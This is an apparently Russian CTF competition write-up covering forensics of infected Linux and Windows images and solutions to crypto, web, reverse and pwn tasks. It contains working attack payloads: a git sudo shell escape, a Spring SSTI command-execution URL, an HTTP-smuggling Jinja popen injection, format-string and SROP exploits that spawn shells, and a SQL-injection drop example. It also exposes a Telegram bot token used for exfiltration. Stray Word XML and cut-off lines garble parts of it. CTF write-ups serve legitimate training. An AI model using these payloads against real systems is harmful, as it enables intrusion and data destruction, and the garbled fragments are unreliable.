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НТО разбор RopRunners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Нам дан образ диска .vmdk, замоунтим его в /mnt с помощью `sudo guestmount -a Debian\ Forensics.vmdk -i /mnt/vmdk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Будем использовать `chroot /mnt/vmdk /bin/bash` для удобства.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1,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Просмотрев файловую систему находим следы установки `gitlab-ce 15.2.2`. Он находится в `/opt/`. Быстрый поиск в Интернете выдаёт, что эта версия GitLab уязвима. Возможна RCE с помощью **CVE-2022-2884**.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3,4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`/etc/sudoers` написанно что `/usr/bin/git` может запускаться с привилегиями `root `без пароля.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Можем использовать этот файл для повышения привилегий.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PAGER=’sh -c “exec sh 0&lt;&amp;1”‘ git -p help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Прописал свой ключ в `.ssh/authorized_keys`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файле `.bash_history` видим, что был удалён файл `linpeas`. Это популярный сканнер системы. https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS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`.bash_history` видим изменения файла `/etc/ld.so.preload`. Так он записал файл `/XxJynx/jynx2.so` в `LD_PRELOAD` - переменную окружения, которая загружает библиотеки в ней.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Jynx2 и является LD_PRELOAD-based rootkit-ом.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https://github.com/chokepoint/Jynx2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1 - 2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Прочитав легенду к заданию имеем, что компьютер был заражен путем перехода по ссылке из сообщения. Скачиваем файл образа и запускаем виртуалку. Первым делом, запустив винду, начинаем изучать файловую систему и ищем странные файлы.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Находим C:\Users\Evgeniy\AppData\Roaming\Rjomba.exe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Далее можно посмотреть логи через просмоторщик событий. Пробуем найти действия по этому подозрительному файлу.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1 - 2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Прочитав легенду к заданию имеем, что компьютер был заражен путем перехода по ссылке из сообщения. Скачиваем файл образа и запускаем виртуалку. Первым делом, запустив винду, начинаем изучать файловую систему и ищем странные файлы.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Находим C:\Users\Evgeniy\AppData\Roaming\Rjomba.exe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Далее можно посмотреть логи через просмоторщик событий. Пробуем найти действия по этому подозрительному файлу.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описании события видно код. Если всмотреться детальнее, то видно, что файл скачивали с http://95.169.192.220:8080. Перейдя по адресу видим файл aboba с содержанием negr и файл prikol.exe, который и есть Rjomba.exe. Отсюда получаем ответ на первые 2 вопроса. После фишинговой атаки на почту, пользователь выполняет вредоносный код, который скачивает данный файл.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Чтобы ответить на следующий вопрос продолжаем дальше искать информацию. Зная, что вирус получен по почте, попробуем найти логи или бэкапы различных почт. Исходя из того что других почт нет и есть логи и файлы только аутлука то делаем вывод что юзался аутлук. В темпе есть файлы .ransom и обычные .txt но в них нет полезной инфы кроме адреса почты company_worker123@rambler.ru.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 адресу C:\Users\Evgeniy\AppData\Local\Microsoft\Outlook\company_worker123@rambler.ru находим outlook data file. Распаковывая данный файл с помощью binwalk и анализируя его находим странность с файлом TOP_SECRET.pdf. При использовании бинволка видим что экстеншн "ненормальный".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TOP_SECRET.pdf /TOP_SECRET.pdf .cmd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гугля что то на подобии .pdf .cmd vulnerability находим что это WinRAR RCE Vulnerability (CVE-2023-38831)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ВПО сканирует список процессов на наличие отладчиков и другого ПО и завершает их. Например, taskmgr, x64dbg.exe. Получает информацию о процессе через WINAPI NtQueryInformationProcess.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Противодействует отладке с помощью функции INT 3, которая останавливает отладчик.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Открыв файл в гидре, можно увидеть функции из библиотеки CryptoPP.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 названиям использованных функций сразу узнаем, что это 256-битный AES-CBC.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Понимаем, что реверс этого файла ничем не увенчается. Тогда запускаем, замораживаем и записываем полный дамп памяти процесса. Поскольку мы знаем, что это 256-битный AES, то ищем ключ длиной 32 байта. Фильтруем все строчки в файле и находим подозрительную строчку amogusamogusamogusamogusamogusam, которая и является ключом.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Чтобы узнать какие данные ВПО отправляет на сервер, мы будем перехватывать траффик в машине. Также установим свой SSL-сертификат, чтобы расшифровать SSL. После запуска Rjomba.exe видим запросы на Telegram-API бота.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Запрос: `https://api.telegram.org/bot7029575943:AAFNYmmW_QqqMcaHZ-DFRn3M05DptExeAGE/sendDocument)`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Ответ в виде json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“ok” : true, “result” : { “caption” : “{ab942673-d5a2-11ee-b27c-806e6f6e6963}”, “chat” : { “first_name” : “SOME EVIL HACKER just kidding”, “id” : 6591405725, “type” : “private” }, “date” : 1710943588, “document” : { “file_id” : “BQACAgEAAxkDAAM3ZfrtY_0jC_8Uxe600S8tOOz2A6MAAlgEAAJYddhHPBrSlQABzkvdNAQ”, “file_name” : “info.txt”, “file_size” : 10347391, “file_unique_id” : “AgADWAQAAlh12Ec”, “mime_type” : “text/plain” }, “from” : { “first_name” : “Testing bot”, “id” : 7029575943, “is_bot” : true, “username” : “some_forensics_testing_bot” }, “message_id” : 55 }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пункте 6 мы уже нашли ключ, осталось только найти вектор инициализации, длиной 16-байт. Он находился в дампе рядом с ключем. Чтобы расшифровать файл перекодируем его обратно из base64 и расшифруем с помощью наших данных.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Финальные ответы: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1) ВПО попало на компьютер через фишинговую атаку на почту. В журнале событий мы видим как Powershell-скрипт скачивает полезную нагрузку и сохраняет её в файл Rjomba.exe.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2)95.169.192.220. IP-адрес принадлежит хостингу MVPS и находится Нидерландах. Работает до сих пор, на нём запущен вебсервер и SSH. На вебсервере лежит само ВПО и файл со словом negr.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3)Сам запустил vba. Антивирусное ПО не успело обнаружить скачанный скриптом .exe файл и произошло заражение.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4)Завершает процессы отладчиков и диспетчера задач.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5)Rijndael AES256-CBC из библиотеки CryptoPP.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6)amogusamogusamogusamogusamogusam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7)Ключ: AAFNYmmW_QqqMcaHZ-DFRn3M05DptExeAGE GET [https://api.telegram.org/bot7029575943:AAFNYmmW_QqqMcaHZ-DFRn3M05DptExeAGE/sendDocument](https://api.telegram.org/bot7029575943:AAFNYmmW_QqqMcaHZ-DFRn3M05DptExeAGE/sendDocument)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◦ Ответ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“ok” : true, “result” : { “caption” : “{ab942673-d5a2-11ee-b27c-806e6f6e6963}”, “chat” : { “first_name” : “SOME EVIL HACKER just kidding”, “id” : 6591405725, “type” : “private” }, “date” : 1710943588, “document” : { “file_id” : “BQACAgEAAxkDAAM3ZfrtY_0jC_8Uxe600S8tOOz2A6MAAlgEAAJYddhHPBrSlQABzkvdNAQ”, “file_name” : “info.txt”, “file_size” : 10347391, “file_unique_id” : “AgADWAQAAlh12Ec”, “mime_type” : “text/plain” }, “from” : { “first_name” : “Testing bot”, “id” : 7029575943, “is_bot” : true, “username” : “some_forensics_testing_bot” }, “message_id” : 55 }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8) sFYZ#2z9VdUR9sm`3JRz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CTF TASKS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crypto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tomatch = get(url + "EncryptedPin").json()['encrypted_pin']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piniv = getiv()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print(tomatch, piniv)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pin in range(100000):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if(pin % 100 == 0):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print(pin)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curriv = getiv()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padded_pin = str(pin).encode('utf-8').ljust(16, b'\x00')  # Дополнение до 16 байт нулями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encpni = encrypt_pin(xor(curriv , piniv , padded_pin).decode("utf-8"))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tomatch == encpni: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print("FOUND - " + str(pin))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print(checkpin(pin).text)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print(f"error occured with - " + pin)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print(post(url + "CheckPin", json={'pin': my_pin}).text)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После прочтения исходников становится очевидным, что IV нам всегда известен. Реализуем Chosen-Plaintext-Attack. Можем подбирать пины и ксорить их со своим IV и IV зашифрованного пина. После этого сравнивает шифротексты и когда они совпадают - то и пины тоже совпадают. Запрашиваем флаг - задание решено.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web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 задании нам дана ссылка http://192.168.12.10:5001/ Переходим по ней. Видим обычный календарь. Можно заметить, что число 20 является ссылкой, тк оно синее. Переходим и видим. Прочитав хинт, очевидно, что флаг в /etc/secret и получить его можно через параметр в url. Пишем в параметр ../../../../../../../../etc/secret. После этого скачивается файл с флагом.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web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Прочитав исходники, заметим, что используется Framework Spring. Гуглим Java Spring SSTI Manipulation и на втором сайте находим эксплойт.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Делаем запрос для пароля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http://192.168.12.13:8090/doc/$%7Bnew%20java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(%22cat%20password.txt%22).getInputStream()).next()%7D::.main.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Потом делаем запрос с полученным паролем и достаем флаг</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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http://192.168.12.13:8090/login?password=33a61c66899af2114c8f98d80ceb2857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web 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После прочтения исходного кода понятно, что нужно сделать flask injection на url /flag. Но этот урл блочится haproxy. Для обхода будем использовать http smuggling.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Код на Python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api-endpoint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URL = "http://192.168.12.11:8001?"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with open("test.txt", "a") as f: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 =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 +=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 = requests.get(url = URL)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r.headers.get('Content-Length') == '11044':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print(r.text)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print(r.headers)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f.write(r.text)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Запрос для Burp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Host: 192.168.12.11:8001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Content-Length: 148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Transfer-Encoding: chunked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GET /flag?c=class&amp;name={{(config|attr(request.args.c)).from_envvar.globals.import_string("os").popen("cat%20*").read()}} HTTP/1.1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X: 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reverse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code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#define LOG(x) cout &lt;&lt; #x &lt;&lt; ": " &lt;&lt; x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static uint32_t DATA[] =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0xEDCFE1F3,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0x646BCD23,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0x50F9AD57,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0xF299B1E1,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0xC6A9B6E4,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0x3280614C,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0x93772B02,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0xAB2C3A43,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0x2A0D936A,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0x1BFA14D4,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0x255D6F2F,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0xC447F66B,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0x5AD96CF5,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0xE964AD12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uint arr[256];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static char isarrInited = '\0';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void initarr()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int j;   </w:t>
        <w:tab/>
        <w:t xml:space="preserve">// [rsp+0h] [rbp-10h]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int i;   </w:t>
        <w:tab/>
        <w:t xml:space="preserve">// [rsp+4h] [rbp-Ch]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uint64_t v3;</w:t>
        <w:tab/>
        <w:t xml:space="preserve">// [rsp+8h] [rbp-8h]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for (i = 0; i &lt;= 255; ++i)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v3 = i;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&lt;= 7; ++j)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((v3 &amp; 1) != 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v3 = (v3 &gt;&gt; 1) ^ 0xEDB88320;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v3 &gt;&gt;= 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arr[i] = v3;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isarrInited = 1;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int64_t f(char *str)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uint32_t z = 0xFFFFFFFF;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for (int i = 0; i &lt; 2; ++i)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(z &gt;&gt; 8) ^ arr[(unsigned char)(z ^ str[i])];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return ~z;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find_chars(uint32_t value)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bool is_find = false;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for (int first = 0;first &lt; 256 &amp;&amp; !is_find;first++){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second = 0;second &lt; 256 &amp;&amp; !is_find;second++){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uint32_t z = 0xFFFFFFFF;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z = (z &gt;&gt; 8) ^ arr[(unsigned char)(z ^ first)];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z = (z &gt;&gt; 8) ^ arr[(unsigned char)(z ^ second)];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z = ~z;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(uint32_t(z) == value){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std::cout &lt;&lt; char(first) &lt;&lt; ' ' &lt;&lt; char(second) &lt;&lt; ' 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is_find = true;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if (!is_find){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"no " &lt;&lt; "value " &lt;&lt; value;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bool check(char *str)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uint16_t len = strlen(str);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uint16_t i;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for (i = 0; i &lt; (uint16_t)(len / 2); ++i)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(DATA[i] != (uint32_t)f(&amp;str[2 * i]))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return DATA[i] == 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initarr();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uint16_t len = 26;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for (int i = 0; i &lt; 14; i++){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find_chars(DATA[i]);   </w:t>
        <w:tab/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solve();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pwn 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Закидываем бинарь в иду, видим форматную строку, функцию win и exit после printf: ![[Pasted image 20240321141948.png]] Можем переписать global offset table, так как pie и relro не включены Перепишем exit на win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pwn import *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r = process('./main')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 = remote('192.168.12.13', 1923)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elf = context.binary = ELF('./main')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win = 0x00401156 # адрес win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payload = fmtstr_payload(6, {elf.got['exit']: win})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with open("/tmp/payload", 'wb') as f:  # дебаг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f.write(payload)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r.sendline(payload)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r.interactive()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Получаем шелл и читаем флаг в /flag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pwn2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Открыв бинарь в иде можно увидеть всю программу в паре пикселей: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mov </w:t>
        <w:tab/>
        <w:t xml:space="preserve">rdi, 0      </w:t>
        <w:tab/>
        <w:t xml:space="preserve">; Alternative name is '_start'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; __start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mov </w:t>
        <w:tab/>
        <w:t xml:space="preserve">rsi, rsp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sub </w:t>
        <w:tab/>
        <w:t xml:space="preserve">rsi, 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mov </w:t>
        <w:tab/>
        <w:t xml:space="preserve">rdx, 1F4h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syscall             </w:t>
        <w:tab/>
        <w:t xml:space="preserve">; LINUX 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retn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Поскольку rax не инициализирован, бинарь syscallом запускает read(), что можно подтвердить через gdb: ![[Pasted image 20240321143212.png]] Поскольку nx и pie выключены, мы можем закинуть шеллкод и перейти к нему с помощью srop.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Прогнав strings по бинарю можно найти строчку /bin/bash 0x41430 Нам предоставили гаджет pop rax; ret;, С помощью него мы можем выполнить любой syscall. Так, syscall sigreturn берет значения со стека и кладет их в регистры. Таким образом мы можем управлять любым регистром.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Воспользуемся SigreturnFrame пывнтулза, тогда наша цепочка = pop_rax_addr + sigretSyscall + syscall_addr + frame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В rax укажем syscall для execve - 0x3b В rdi установим указатель на ранее найденный /bin/bash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pwn import *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context.binary = './task'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r = process('./task')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 = remote('192.168.12.13', 1555)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entry_addr = context.binary.symbols['_start']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syscall_addr = entry_addr + 21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pop_rax_gadget = 0x41018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print(hex(entry_addr), hex(syscall_addr))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payload = b'/bin/sh\0'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payload += p64(pop_rax_gadget)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payload += p64(0xf)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payload += p64(syscall_addr)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frame = SigreturnFrame()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frame.rax = 0x3b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frame.rdi = 0x41430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frame.rsi = 0x0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frame.rdx = 0x0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frame.rip = syscall_addr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payload += bytes(frame)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with open("/tmp/realp", 'wb') as f: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f.write(payload)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r.sendline(payload)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r.interactive()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STAGE 3 исправление уязвимостей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В файле auth_api.pyв строке 211 присутствует самая простая SQL-инъекция. При смене пароля злоумышленник может выполнить любой SQL-запрос.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Например, в графе новый пароль можно указать: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1'; DROP ALL TABLES ;--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Вся БД будет удалена.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Исправить можно так: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update_cursor.execute("UPDATE user SET pw = '?' WHERE login = '?';", str(new_password), str(username))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Стоит отметить, что пароли никогда не стоит хранить в простом тексте. Пароли нужно всегда хешировать с солью.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Всегда нужно экранировать символы перед запрос в базу данных. Также не стоит возвращать ошибку базы данных для пользователя. error = “Ошибка БД: “ + str(e)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12.13:8090/login?password=33a61c66899af2114c8f98d80ceb2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